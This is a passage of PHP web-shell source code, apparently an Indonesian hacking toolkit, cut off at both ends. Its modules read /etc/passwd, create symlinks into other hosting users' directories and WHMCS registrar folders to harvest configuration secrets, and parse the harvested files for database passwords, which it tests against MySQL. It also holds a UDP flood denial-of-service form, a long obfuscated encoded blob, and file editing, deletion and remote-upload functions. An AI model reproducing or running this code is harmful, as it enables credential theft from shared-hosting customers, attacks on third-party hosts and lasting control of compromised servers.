- DirectoryIndex seees.html
- RemoveHandler .php
- AddType application/octet-stream .php ">Litespeed</option>
- </select> <input style="color:red;background-color:#000000" name="anu" size="10"
- value="<< START SCAN >>" type="submit">
- <br/><br/></form></center>
- <?php
- @ini_set('html_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('display_errors', 0);
- @ini_set('file_uploads',1);
- if ($_POST['anu']) {
- $path = $_POST['path'];
- $home = $_POST['home'];
- $functions=@ini_get("disable_functions");
- if(eregi("symlink",$functions))
- {
- die ('Kurang Ganteng Cok');
- }
- @mkdir(RESELLER, 0755);
- @chdir(RESELLER);
- $htaccess=$_POST['soft'];
- file_put_contents(".htaccess",$htaccess,FILE_APPEND);
- $passwd=explode("\n",$_POST["passwd"]); foreach($passwd as $pwd){
- $user=trim($pwd);
- @symlink('/'.$home.'/'.$user.'/public_html/moving.page/index.html',$user.' <~ RESELLER1');
- @symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER2');
- }
- echo '<center>
- <font face="Audiowide" size="5" style="color:red;background-color:#000000">
- <img src="http://www.komunitas.for-indonesia.com/images/smiley/piss.gif"><br/>
- Scanning Complete....<br/>
- Now Checking Folder Result....<br/><br/><br/>
- <a href="/RESELLER">O=[ GO TO HELL ]=O</a>
- </font>
- <br/><br/><br/></center> </body></html> ';
- }
- ?>
- <?php }
- # x=dmwhmcs11
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmwhmcs11')){ ?>
- <form action="?dm=<?php echo $pwd; ?>&x=dmwhmcs11" method="post">
- <?php
- echo '<br><br><body bgcolor=black><center>
- <img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"><br/><br/>
- <nobr><span class="b7">O=:[ SCAN CMS</span> <span class="b8">WHMCS ]:=O</nobr></span><br/><br/>
- <form method="POST">
- <center>
- <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
- $uSr=file("/etc/passwd");
- foreach($uSr as $usrr)
- {
- $str=explode(":",$usrr);
- echo $str[0]."\n";
- }
- ?>
- </textarea><p>
- <nobr><font style="color:red;background-color:#000000">
- [~] Home :
- <select style="color:red;background-color:#000000" title="Select Target Home" name="home" size="10">
- <option title="home" value="home">home</option>
- <option title="home2" value="home2">home2</option>
- <option title="home3" value="home3">home3</option>
- <option title="home4" value="home4">home4</option>
- <option title="home5" value="home5">home5</option>
- <option title="home6" value="home6">home6</option>
- <option title="home7" value="home7">home7</option>
- <option title="home8" value="home8">home8</option>
- <option title="home9" value="home9">home9</option>
- <option title="home10" value="home10">home10</option>
- </select> [~] Htaccess :
- <select style="color:red;background-color:#000000" title="Select Software" name="soft" size="10">
- <option title="Apache" value="Options all
- Options +Indexes
- Options +FollowSymLinks
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any">Apache</option>
- <option title="Litespeed" value="
- Options +FollowSymLinks
- DirectoryIndex seees.html
- RemoveHandler .php
- AddType application/octet-stream .php ">Litespeed</option>
- </select> <input style="color:red;background-color:#000000" name="anu" size="10"
- value="<< START SCAN >>" type="submit">
- <br/><br/></form></center>
- <?php
- @ini_set('html_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('display_errors', 0);
- @ini_set('file_uploads',1);
- if ($_POST['anu']) {
- $path = $_POST['path'];
- $home = $_POST['home'];
- $functions=@ini_get("disable_functions");
- if(eregi("symlink",$functions))
- {
- die ('Kurang Ganteng Cok');
- }
- @mkdir(WHMCS, 0755);
- @chdir(WHMCS);
- $htaccess=$_POST['soft'];
- file_put_contents(".htaccess",$htaccess,FILE_APPEND);
- $passwd=explode("\n",$_POST["passwd"]);
- foreach($passwd as $pwd){
- $user=trim($pwd);
- @symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER');
- @symlink('/'.$home.'/'.$user.'/public_html/modules/registrars/',$user.' <~ WHMCS-1'); @symlink('/'.$home.'/'.$user.'/public_html/account/modules/registrars/',$user.' <~ WHMCS-2');
- @symlink('/'.$home.'/'.$user.'/public_html/accounts/modules/registrars/',$user.' <~ WHMCS-3');
- @symlink('/'.$home.'/'.$user.'/public_html/central/modules/registrars/',$user.' <~ WHMCS-4');
- @symlink('/'.$home.'/'.$user.'/public_html/clienti/modules/registrars/',$user.' <~ WHMCS-5');
- @symlink('/'.$home.'/'.$user.'/public_html/client/modules/registrars/',$user.' <~ WHMCS-6');
- @symlink('/'.$home.'/'.$user.'/public_html/cliente/modules/registrars/',$user.' <~ WHMCS-7');
- @symlink('/'.$home.'/'.$user.'/public_html/clientes/modules/registrars/',$user.' <~ WHMCS-8');
- @symlink('/'.$home.'/'.$user.'/public_html/clients/modules/registrars/',$user.' <~ WHMCS-9');
- @symlink('/'.$home.'/'.$user.'/public_html/clientarea/modules/registrars/',$user.' <~ WHMCS-9');
- @symlink('/'.$home.'/'.$user.'/public_html/clientsarea/modules/registrars/',$user.' <~ WHMCS-10');
- @symlink('/'.$home.'/'.$user.'/public_html/client-area/modules/registrars/',$user.' <~ WHMCS-11');
- @symlink('/'.$home.'/'.$user.'/public_html/clients-area/modules/registrars/',$user.' <~ WHMCS-12');
- @symlink('/'.$home.'/'.$user.'/public_html/clientzone/modules/registrars/',$user.' <~ WHMCS-13');
- @symlink('/'.$home.'/'.$user.'/public_html/client-zone/modules/registrars/',$user.' <~ WHMCS-14');
- @symlink('/'.$home.'/'.$user.'/public_html/core/modules/registrars/',$user.' <~ WHMCS-15');
- @symlink('/'.$home.'/'.$user.'/public_html/company/modules/registrars/',$user.' <~ WHMCS-16');
- @symlink('/'.$home.'/'.$user.'/public_html/customer/modules/registrars/',$user.' <~ WHMCS-17');
- @symlink('/'.$home.'/'.$user.'/public_html/customers/modules/registrars/',$user.' <~ WHMCS-18');
- @symlink('/'.$home.'/'.$user.'/public_html/bill/modules/registrars/',$user.' <~ WHMCS-19');
- @symlink('/'.$home.'/'.$user.'/public_html/billing/modules/registrars/',$user.' <~ WHMCS-20');
- @symlink('/'.$home.'/'.$user.'/public_html/finance/modules/registrars/',$user.' <~ WHMCS-21');
- @symlink('/'.$home.'/'.$user.'/public_html/financeiro/modules/registrars/',$user.' <~ WHMCS-22');
- @symlink('/'.$home.'/'.$user.'/public_html/host/modules/registrars/',$user.' <~ WHMCS-23');
- @symlink('/'.$home.'/'.$user.'/public_html/hosts/modules/registrars/',$user.' <~ WHMCS-24');
- @symlink('/'.$home.'/'.$user.'/public_html/hosting/modules/registrars/',$user.' <~ WHMCS-25');
- @symlink('/'.$home.'/'.$user.'/public_html/hostings/modules/registrars/',$user.' <~ WHMCS'-26);
- @symlink('/'.$home.'/'.$user.'/public_html/klien/modules/registrars/',$user.' <~ WHMCS-27');
- @symlink('/'.$home.'/'.$user.'/public_html/manage/modules/registrars/',$user.' <~ WHMCS-28');
- @symlink('/'.$home.'/'.$user.'/public_html/manager/modules/registrars/',$user.' <~ WHMCS-29');
- @symlink('/'.$home.'/'.$user.'/public_html/member/modules/registrars/',$user.' <~ WHMCS-30');
- @symlink('/'.$home.'/'.$user.'/public_html/members/modules/registrars/',$user.' <~ WHMCS-31');
- @symlink('/'.$home.'/'.$user.'/public_html/my/modules/registrars/',$user.' <~ WHMCS-32');
- @symlink('/'.$home.'/'.$user.'/public_html/myaccount/modules/registrars/',$user.' <~ WHMCS-33');
- @symlink('/'.$home.'/'.$user.'/public_html/my-account/client/modules/registrars/',$user.' <~ WHMCS-34');
- @symlink('/'.$home.'/'.$user.'/public_html/myaccounts/modules/registrars/',$user.' <~ WHMCS-35');
- @symlink('/'.$home.'/'.$user.'/public_html/my-accounts/modules/registrars/',$user.' <~ WHMCS-36');
- @symlink('/'.$home.'/'.$user.'/public_html/order/modules/registrars/',$user.' <~ WHMCS-37');
- @symlink('/'.$home.'/'.$user.'/public_html/orders/modules/registrars/',$user.' <~ WHMCS-38');
- @symlink('/'.$home.'/'.$user.'/public_html/painel/modules/registrars/',$user.' <~ WHMCS-39');
- @symlink('/'.$home.'/'.$user.'/public_html/panel/modules/registrars/',$user.' <~ WHMCS-40');
- @symlink('/'.$home.'/'.$user.'/public_html/panels/modules/registrars/',$user.' <~ WHMCS-41');
- @symlink('/'.$home.'/'.$user.'/public_html/portal/modules/registrars/',$user.' <~ WHMCS-42');
- @symlink('/'.$home.'/'.$user.'/public_html/portals/modules/registrars/',$user.' <~ WHMCS-43');
- @symlink('/'.$home.'/'.$user.'/public_html/secure/modules/registrars/',$user.' <~ WHMCS-44');
- @symlink('/'.$home.'/'.$user.'/public_html/support/modules/registrars/',$user.' <~ WHMCS-45');
- @symlink('/'.$home.'/'.$user.'/public_html/supporte/modules/registrars/',$user.' <~ WHMCS-46');
- @symlink('/'.$home.'/'.$user.'/public_html/supports/modules/registrars/',$user.' <~ WHMCS-47');
- @symlink('/'.$home.'/'.$user.'/public_html/web/modules/registrars/',$user.' <~ WHMCS-48');
- @symlink('/'.$home.'/'.$user.'/public_html/webhost/modules/registrars/',$user.' <~ WHMCS-49');
- @symlink('/'.$home.'/'.$user.'/public_html/webhosting/modules/registrars/',$user.' <~ WHMCS-50');
- @symlink('/'.$home.'/'.$user.'/public_html/whm/modules/registrars/',$user.' <~ WHMCS-51');
- @symlink('/'.$home.'/'.$user.'/public_html/whmcs/modules/registrars/',$user.' <~ WHMCS-52');
- @symlink('/'.$home.'/'.$user.'/public_html/whmcs2/modules/registrars/',$user.' <~ WHMCS-53');
- @symlink('/'.$home.'/'.$user.'/public_html/Whm/modules/registrars/',$user.' <~ WHMCS-54');
- @symlink('/'.$home.'/'.$user.'/public_html/Whmcs/modules/registrars/',$user.' <~ WHMCS-55');
- @symlink('/'.$home.'/'.$user.'/public_html/WHM/modules/registrars/',$user.' <~ WHMCS-56');
- @symlink('/'.$home.'/'.$user.'/public_html/WHMCS/modules/registrars/',$user.' <~ WHMCS-57');
- }
- echo '<hr color="#00bfff"><center>
- <font face="Audiowide" size="5" style="color:#00bfff;background-color:#000000">
- <img src="http://www.komunitas.for-indonesia.com/images/smiley/piss.gif"><br/>
- Scanning Complete....<br/>
- Now Checking Folder Result....<br/><br/><br/>
- <a href="/WHMCS">O=[ GO TO HELL ]=O</a>
- </font>
- <br/><br/><br/></center> </body></html> ';
- }
- ?>
- <?php }
- # x=cp3
- elseif(isset($_GET['x']) && ($_GET['x'] == 'cp3')){
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=cp3" method="post">
- <?php
- set_time_limit(0);
- error_reporting(0);
- if(isset($_POST['url'])){
- $url = $_POST['url'];
- }else{
- $url = 'http://';
- }
- echo '<center><br/><br/><nobr><span class="b7">O=:[ CPANEL</span> <span class="b8">GRABBER ]:=O</nobr><br/><br/>
- <form method="POST">
- <input name="url" style="color:#FF0000;background-color:#000000" type="text" value="'.$url.'" size="40"/><br/>
- <p><input type="submit" style="color:#FF0000;background-color:#000000" value="--:[ CROTZ ]:--"/>
- </form><br/><br/>';
- if(isset($_POST['url'])){
- if(!file_get_contents($url)){
- echo '--:[ ERROR BRAY ]:--';
- }else{
- $a = 0;
- foreach(get_data($url) as $info){
- if(login($info[0],$info[1])){
- echo "<b style=' color: #808080 ; text-shadow:0px 0px 1px #808080 ;'>-:[ USERNAME & PASSWORD ]:-</b> <b style=' color: #0000FF ; text-shadow:0px 0px 1px #0000FF ;'>[$info[0]]</b> <b style=' color: #CC0000; text-shadow:0px 0px 1px #CC0000;'>[$info[1]]</b><br />";
- $a++;
- }
- }
- echo "<b style=' color: #808080 ; text-shadow:0px 0px 1px #808080 ;'><hr> *SUKSES ^_^ || $a CPANEL FOUNDED*<br />";
- }
- }
- echo '<br/><div align="center"><font color="blue" face="Verdana" size="3">--=|[+] Sh4d0w4rT [+]|=--</font></div>
- </body>
- </html>';
- function ex($a,$b,$text){
- $explode = explode($a,$text);
- $explode = explode($b,$explode[1]);
- return $explode[0];
- }
- function login($user,$pass){
- $c = @mysql_connect('localhost',$user,$pass);
- if($c){
- mysql_close($c);
- return true;
- }else{
- return false;
- }
- }
- function get_data($url){
- $ar = array('1.txt','2.txt','3.txt','4.txt','5.txt','6.txt','7.txt','8.txt','9.txt','10.txt','11.txt','12.txt','13.txt','14txt','15.txt','16.txt','17.txt','18.txt','19.txt','20.txt','21.txt','22.txt','23.txt','24.txt','25.txt','26.txt','27.txt','28.txt','29.txt','30.txt','31.txt','32.txt','33.txt','34.txt','35.txt','36.txt','37.txt','38.txt','39.txt','40.txt','41.txt','42.txt','43.txt','44.txt','45.txt','46.txt','47.txt','48.txt','49.txt','50.txt');
- $src = file_get_contents($url);
- $files = explode('<a href="',$src);
- $data = array();
- foreach($files as $id=>$file){
- if($id == 0){
- continue;
- }
- $file = explode('">',$file);
- $file = trim($file[0]);
- if(!eregi('.txt',$file)){
- continue;
- }
- $src = file_get_contents("$url/$file");
- if(!$src){
- continue;
- }
- $user = str_replace($ar,'',$file);
- $user = str_replace($ar,'',$user.'.txt');
- $user = str_replace($ar,'',$user.'.txt');
- $user = trim(str_replace('.txt','',$user));
- if(eregi("WordPress",$src)){
- $pass = ex("define('DB_PASSWORD', '","');",$src);
- $data[] = array($user,$pass);
- }else{
- $tokens = token_get_all($src);
- foreach($tokens as $token){
- if(!$token[1]){
- continue;
- }
- $tokenname = token_name($token[0]);
- if($tokenname != 'T_VARIABLE'){
- continue;
- }
- $var = $token[1];
- if(eregi('pass',$var)){
- $f = str_replace(' ','',ex($var,';',$src));
- $a = trim(ex("='","'",$f));
- $b = trim(ex('"','"',$f));
- if($a != ''){
- $pass = $a;
- }elseif($b != ''){
- $pass = $b;
- }
- if($pass == ''){
- continue;
- }
- $data[] = array($user,$pass);
- }
- }
- }
- }
- return $data;
- }
- ;
- return;
- ?>~Dkr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLT09NHeEXHr8XhtONT08XHeEXHr8Pkr8XTzEXT08XHtILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==tmYlfy90DB1lb2xpdBl0heEpKXplFmkvFl9ZcbnvFmOpdMFPHtL7tMlMholzF2a0htOgAr9TaySmfbkSk10phbShkuaZdtE9wtOgAr9TaySmfbkSk107tm1lduYlGXPLfbkSwe0Ik2i0fuE6RZ93f3FVkzShgWplC2ivwtF8wAONW1OcArAIUyOYTe4hNoi0dBX+tjxPcByLNIP8fol0doA+WJ1owrYvdMcpc19jAoyVcBX8R3OpfoxlNIP8F3O5doAIfulXcT0Jfoa4ft9jF3HJNIPhCM9LGbShwtEIdByZc2lVwePICba0dzShwtEICMyjD2fZd3aVct1jd2xvFjPjcjcMYMC2KXPIwtnjd2xvFjPIwzHzKTL5KTShwtEIcM9Vft1MCB1pduL6wuOiDo9sCUXIc2aVcbciRtnSfBYpcorSduajDBOiwofZCB5LcUXICbkpCBXSwoilduclfoljCUXIF2yVFZ1zcbkpcjShwtEIcM9Vft1MCB1pduL6wer0FuI7tJEIwuOlGuWsCBxpc246woYldmOlFjShwtEIwocvdmWsf2apc2i0KJnJd2xLweShgWPhDB5XfbWSfoa4foyZcBrSF2aScBY0GXpMd250RbflDBfPfePICM9SceShC29Sd3w6wtHXHeEXHeE7tMkvFMOlFjPIHbn4wuYvdolLwtYeW0YeW0H7tMkiC2smFM91dMWsC29Sd3w6wufPDbOlKXpXCBOLDB5mKJEzFuI7tMkvFMOlFJ1ZCBOpfbH6wefXGeShgWPhDB5XfbW6cM9jfbY7tIPICM94RbYPCBOvfzPIHun4wenXGtE1FuIIwzEXKAC5OjShtm0hw2cvd3OlFJEIGXPhC29Sd3w6wtHXHeEXHeE7tMcvdmWscMysDBx5KJExYun4KXp0cbi0RbYPCBOvfzPIHun4wenXGtExFuIIwzEXHeEXHeShcM9Vft13cBlmDuW6wo5vFM1ideShgWpiGXPIwuOlGuWscoajd3kifolvdjPIdM9VcTShwtnjd2xvFjPjHzHzHzHzKXp9tjXvF3O5doA+tjXvDoaice4hNokvcuL+tjxLDbCIDBW9wmOvd2XJNIP8UerIF3O5doA9wMYvdo9ZKJEjYeW0YeW0KZn0cbi0RbYPCBOvfzPIHun4wenXGtExFuIIwzEXHeEXHtw7foa4ft1idolmdjPIC2aVfoaZKz5tRACIW29VcMlmb2YWCB5ldeXvUer+tjxMd3kswo1lfoivce0JAr9Tatw+tjxpdmn1ftnVCB1lNUk1FMXJwuO5FoA9wmOlGuWJwucidualNUwmRJO1FMXVkZwIF2l6cT0JYeEJwt8+tjxpdmn1ftn0GbnlNUkzfBksDbWJwucidualNUkTfoyZftE+wJEvNIP8R2cvFM0+NokZwt8+NokZwt8+kzShDBCPDbYzcbWPky9WT1YABZf1FMXmbULpGXppcJIicMlSca9mcbOgC29VfoaVfuHPkuaZdtLpGXplC2ivwtfyFmkvFJ4IUB52CBxpctnaALXVkzShgBaSF2a7tJOiwe0IHeShcM9ZcByjDtimcbOgcoy0CUILfbkShUniFZELDB5MdZl7tMlMhoxvc2lVhtOpdMcvBznfRtOpdMcvBzyfhUl7tMajDo8IwjxJwuY0GBxlNUFIC29Sd3w6wtH4HeIXKeEIKZn0cbi0RbYPCBOvfzPXFuIIHun4weyXGtEjKeE4HeIXweSmNlSqbUnaF2aZdMyscUEMwyniF3Y3d3kLweP8R2w+wtE8CJnzfulScT0mwoYvdo9ZKJEjHeEXHrcoweSIfoa4ft1zDoyLd3F6Hun4wenXGtExFuIIwzEXHenoOJE7kz5dkolVcM9dHy1fNt9JNJE8CJnzfulScT0mwoYvdo9ZKJEjW0HXHeEXKZn0cbi0RbYPCBOvfzPXFuIIHun4weyXGtEjW0HXHeEXKZF+BZOpdMcvBzyfbTXvCj48CmwIRz4JKXPLCUSqKXp9tm0hcBYPdZEJNowIF3O5doA9kZnjd2xvFjPIwzIXKeE4HtE7wuOlGuWsF2iico93KjnXGtEXFuIIHbn4wtH4HeIXKeEIKZF+NoiZNJOiwrYXCB5ldtnod3aVcoaLRjxJFJEvNJw7tm0hgWplC2ivwtF8CmwIRz48CmwIRz48CmwIRz48CmwIRz48col2wolLNUkMd290cbwJNmx8wrlLcBrIKjPITbwVWBxzCTYlDZn8gtnWFM9mFMysdBlVcZE6KJnuRAwIguXIOoazDBfVcbwIKjPIWBXsA3fpF3klwux8weXvcol2NIP8R2Opfj48R2kvcuL+tjXvDuOsde4mKXpMfB5jfolvdJnlGtILCUXLCJXLfoa4ftl7tJOlGunSd2Olwe0IcbiXdo9LcUILCUXLfoa4ftL7tJOlGunSd2Olwe0IcbiXdo9LcUILCJXLcbiXdo9LcaSxbUL7tmklfuaZdJELcbiXdo9LcaSXbTShgWpMfB5jfolvdJnSd2fpdJILfbYlFJXLFoyzFZl7tJOjwe0IWo15F3ySb2YvdM5lC3WPk2xvC2ySDo9zftFSkuazcbwSkuniF3HpKXppcJILCZl7tM15F3ySb2YSd3YlhtOjhTShFMa0fbkVwuOZfBA7tm1lduYlGXpZcbO1FM4IcMySF2A7tm0hgWpMfB5jfolvdJnmcbOgcoy0CUILfbkShbShkoyZwe0ICbkZCbLPkzrVfui0kZXmHJ50GuWmRtFzRmO4ftFSkzWVfui0kZXmYU50GuWmRtF2RmO4ftFSkzFVfui0kZXmKt50GuWmRtF5RmO4ftFSkzEVfui0kZL7tJOzFMHINUnMDBxlb2flfy9jd250cB50FZILfbkShTShkocpdoazwe0IcbiXdo9LcUImNorIDuklcj0JkZXLF3kjhTShkoOiforINUniFmkiGUIpKXpMd3klCBYPhtOMDBxlFZniFZELDBW9NJOMDBxlhbShDBCPkolLwe09weEpGXpjd250DB51cTShgWPLcMlScUE9woa4FoxvcoAPkZw+kZXLcMlScUL7tJOMDBxlwe0IfukpdUILcMlScaSXbUL7tMlMhtylFMamDUImRmO4ftFSkocpdoAphbShC29VfolVfBA7tm0hkuYZCZE9wocpdoagc2a0b2YvdmOldmOzhtwLfbkSRZOMDBxlwJL7tMlMhtrLF3kjhbShC29VfolVfBA7tm0hkuazcbwINUnzfukgFMaXdoyjcUILCbwSkZFSkocpdoApKXPLfbYlFJE9wuY0Fl9ZcbnSCBYlhtOiFJXmkZXLfbYlFJ4mRmO4ftFpKXPLfbYlFJE9wuY0Fl9ZcbnSCBYlhtOiFJXmkZXLfbYlFJ4mRmO4ftFpKXPLfbYlFJE9wuOZDB0PF3OZb3klFoxiC2APkZ50GuWmRtFmRtO1F2aZhUL7tMlMhoaZcBfphtkbd3kLAuklF3HJRtOzFMHphbShkuniF3HINUnlGtIJcoaMDB5lhtfrWl9WWaYTa09UOtFSwtFJRtwmhTSJRtOzFMHpKXPLcoy0Casfwe0ICbkZCbLPkuazcbwSkuniF3HpKXp9cBxzcbShkuOvD2aVFZE9wuOvD2aVb2flfy9idoXPkuYZCZL7tMcvFMaiC2IPkuOvD2aVFZniFZELfo9qcB4pGXppcJIikuOvD2aVBzyfhbShC29VfolVfBA7tm0hkuOvD2aVdMyscUE9wuOvD2aVb25idBAPkuOvD2aVBznfhTShDBCPkuOvD2aVdMyscUEiNUEmay9BWakkWAkHOUFpGXpjd250DB51cTShgWPLfMyZwe0IkuOvD2aVBzyfKXppcJilFMamDUImFoyzFZFSkuciFJLpGXPLcJE9wuY0Fl9ZcbnSCBYlhtFIkZXmkZxlGtILfMyZRtF7kZXLF3kjhUL7tJOiwe0IfukpdUilGtIJNUFJRtwmwJXLcJLpKXPLCJE9wuOZDB0PcbIPkZwmRtFJkZXLcJLpKXppcJILCUEiNUEmkZl7tJOXCbYzwe0Ikor7tm1lduYlDBCPkowIwT0IkZFpGXPLFoyzFZE9wtOJKXp9tMlMhtOXCbYzwe09wtFmhbShC29VfolVfBA7tm0hkoOifoydbUE9woyZFMy5htO1F2aZRtOXCbYzhTShgWp9tm0hgWpZcbO1FM4IkoOifor7tm0hKX==alVnRPIq
- <?php }
- # x=dos
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dos')){
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=dos" method="post">
- <?php
- if(isset($_GET['host'])&&isset($_GET['time'])){
- $packets = 0;
- ignore_user_abort(TRUE);
- set_time_limit(0);
- $exec_time = $_GET['time'];
- $time = time();
- print "Started: ".time('d-m-y h:i:s')."<br>";
- $max_time = $time+$exec_time;
- $host = $_GET['host'];
- for($i=0;$i<65000;$i++){
- $out .= 'X';
- }
- while(1){
- $packets++;
- if(time() > $max_time){ break; }
- $rand = rand(1,65000);
- $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
- if($fp){
- fwrite($fp, $out);
- fclose($fp);
- }
- }
- echo "<br><b>UDP Flood</b><br>
- Completed with $packets (" .round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
- echo '<br><br><form action="'.$surl.'" method=GET><input type="hidden" name="act" value="phptools">
- Host: <br><input type=text name=host><br>
- Length (seconds): <br><input type=text name=time><br>
- <input type=submit value=Go></form>';
- } else {
- echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
- <table class="tabnet" style="width:300px;">
- <tr><th colspan="2">UDP Flood</th></tr>
- <tr><td> Host</td>
- <td><input style="width:220px;" class="inputz" type=text name=host value=></td></tr>
- <tr><td> Length (seconds)</td>
- <td><input style="width:220px;" class="inputz" type=text name=time value=></td></tr>
- <tr><td colspan=2 align=center><input style="width:100%;" class="inputzbut" type="submit" value="Attack !" /></td></tr>
- </table></center>';
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){
- @ob_start();
- @eval("phpinfo();");
- $buff = @ob_get_contents();
- @ob_end_clean();
- $awal = strpos($buff,"<body>")+6;
- $akhir = strpos($buff,"</body>");
- echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
- }
- elseif(isset($_GET['view']) && ($_GET['view'] != "")){
- if(is_file($_GET['view'])){
- if(!isset($file))
- $file = magicboom($_GET['view']);
- if(!$win && $posix){
- $name=@posix_getpwuid(@fileowner($file));
- $group=@posix_getgrgid(@filegroup($file));
- $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
- } else {
- $owner = $user;
- }
- $filn = basename($file);
- echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
- <tr><td>Filename</td>
- <td><nobr><span id=\"".clearspace($filn)."_link\">".$file."</span>
- <form action=\"?dm=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
- onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
- </form></nobr></td></tr>
- <tr><td>Size</td>
- <td>".ukuran($file)."</td></tr>
- <tr><td>Permission</td>
- <td>".get_perms($file)."</td></tr>
- <tr><td>Owner</td>
- <td>".$owner."</td></tr>
- <tr><td>Create time</td>
- <td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
- <tr><td>Last modified</td>
- <td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
- <tr><td>Last accessed</td>
- <td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
- <tr><td>Actions</td>
- <td><a href=\"?dm=$pwd&edit=$file\">Edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">Rename</a> | <a href=\"?dm=$pwd&delete=$file\">Delete</a> | <a href=\"?dm=$pwd&dl=$file\">Download</a> (<a href=\"?dm=$pwd&dlgzip=$file\">gzip</a>)</td></tr>
- <tr><td>View</td><td><a href=\"?dm=".$pwd."&view=".$file."&type=code\">Highlight Code</a>
- |
- <a href=\"?dm=".$pwd."&view=".$file."\">Text</a>
- |
- <a href=\"?dm=".$pwd."&view=".$file."&type=image\">image</a></td></tr> </table> ";
- if(isset($_GET['type']) && ($_GET['type']=='image')){
- echo "<div style=\"text-align:center;margin:8px;\">
- <img src=\"?dm=".$pwd."&img=".$filn."\"></div>";
- }
- elseif(isset($_GET['type']) && ($_GET['type']=='code')){
- echo "<div class=\"viewfile\">";
- echo nl2br(htmlentities((@file_get_contents($file))));
- echo "</div>";
- } else {
- echo "<div class=\"viewfile\">";
- $file = wordwrap(@file_get_contents($file),"240","\n");
- @highlight_string($file);
- echo "</div>";
- }
- }
- elseif(is_dir($_GET['view'])) {
- echo showdir($pwd,$prompt);
- }
- }
- elseif(isset($_GET['edit']) && ($_GET['edit'] != "")) {
- if(isset($_POST['save'])) {
- $file = $_POST['saveas'];
- $content = magicboom($_POST['content']);
- if($filez = @fopen($file,"w")) {
- $time = date("d-M-Y H:i",time());
- if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save";
- @fclose($filez);
- } else $msg = "permission denied";
- } if
- (!isset($file)) $file = $_GET['edit'];
- if($filez = @fopen($file,"r")) {
- $content = ""; while(!feof($filez)) {
- $content .= htmlentities(str_replace("''","'",fgets($filez)));
- }
- @fclose($filez);
- }
- ?>
- <form action="?dm=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post">
- <table class="cmdbox">
- <tr><td colspan="2">
- <textarea class="output" name="content"><?php echo $content; ?></textarea></td>
- <tr>
- <td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
- <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> <?php echo $msg; ?></td></tr></table> </form>
- <?php }
- # x=upload
- elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){
- if(isset($_POST['uploadcomp'])){
- if(is_uploaded_file($_FILES['file']['tmp_name'])){
- $path = magicboom($_POST['path']);
- $fname = $_FILES['file']['name'];
- $tmp_name = $_FILES['file']['tmp_name'];
- $pindah = $path.$fname;
- $stat = @move_uploaded_file($tmp_name,$pindah);
- if($stat) {
- $msg = "<br><nobr><span class='b11'>File Uploaded To $pindah ";
- }
- else $msg = "<br>Failed To Upload $fname";
- }
- else $msg = "<br>Failed To Upload $fname </span></nobr>";
- }
- elseif(isset($_POST['uploadurl'])){
- $pilihan = trim($_POST['pilihan']);
- $wurl = trim($_POST['wurl']);
- $path = magicboom($_POST['path']);
- $namafile = download($pilihan,$wurl);
- $pindah = $path.$namafile;
- if(is_file($pindah)) {
- $msg = "<br><nobr><span class='b11'>File Uploaded To $pindah";
- }
- else
- $msg = "<br>Failed Upload $namafile </span></nobr>";
- }
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
- <br><br><table class="tabnet" style="width:320px;padding:0 1px;">
- <tr><th colspan="2"><b> <span class='b12'> _UPLOAD FILE_</span></b></th></tr>
- <tr><td colspan="2"><nobr><p style="text-align:center;"><input style="color:red" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go !" style="width:100px;"></p></nobr></td></tr>
- <tr><td colspan="2">
- <input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
- </table>
- </form>
- <table class="tabnet" style="width:320px;padding:0 1px;">
